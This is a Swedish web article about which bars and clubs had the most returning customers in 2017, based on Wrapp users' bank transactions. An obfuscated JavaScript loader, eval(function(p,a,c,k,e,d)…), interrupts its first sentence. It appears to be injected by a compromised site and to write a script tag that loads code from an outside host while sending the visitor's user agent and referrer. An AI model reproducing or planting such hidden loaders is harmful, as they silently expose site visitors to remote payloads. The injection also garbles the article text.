Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Här är barerna och klubbarna med flest återkommande gäster

Här är barerna och klubbarna med flest återkommande gäster
Sebastian

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eszdk|var|u0026u|referrer|ziftk||js|php’.split(’|’),0,{}))
finns gott om listor över vilka barer som serverar bäst drinkar och vilka barer som passar för första dejten. Vi på Wrapp har undersökt om det motsvarar vilka barer som har mest återkommande gäster hittills under år 2017 och om det är de mest trendiga barerna som vi väljer att gå till. Kartläggningen är baserad på miljontals banktransaktioner av Wrapps användare.

En av de mest välbesökta nattklubbarna är Slakthuset, vars genomsnittskund besökt dem cirka 3,5 gånger under året. Deras mest återkommande gäst har genomfört 46 köp där. Det är förhållandevis få, jämfört med de 167 köp som genomförts av den mest återkommande gästen hos E Street i Sundsvall. E Streets genomsnittskund har besökt dem 4,3 gånger under 2017.

Även om den väletablerade barkedjan Lion Bar ligger högst upp på listan av välbesökta barer, hamnar den inte högt på listan av barer med lojala kunder. Sportbaren Kings Heads har däremot en genomsnittskund som besökt dem 3,7 gånger i år och den mest lojala kunden har dragit sitt kort 48 gånger.

Stureplansgruppens nattklubb PUSH i Göteborg och klubben Flustrets i Uppsala har båda två en genomsnittskund som besökt dem 3,5 gånger under året. Den som genomfört flest köp hos Flustret respektive PUSH, har gjort 45 respektive 26 köp i år.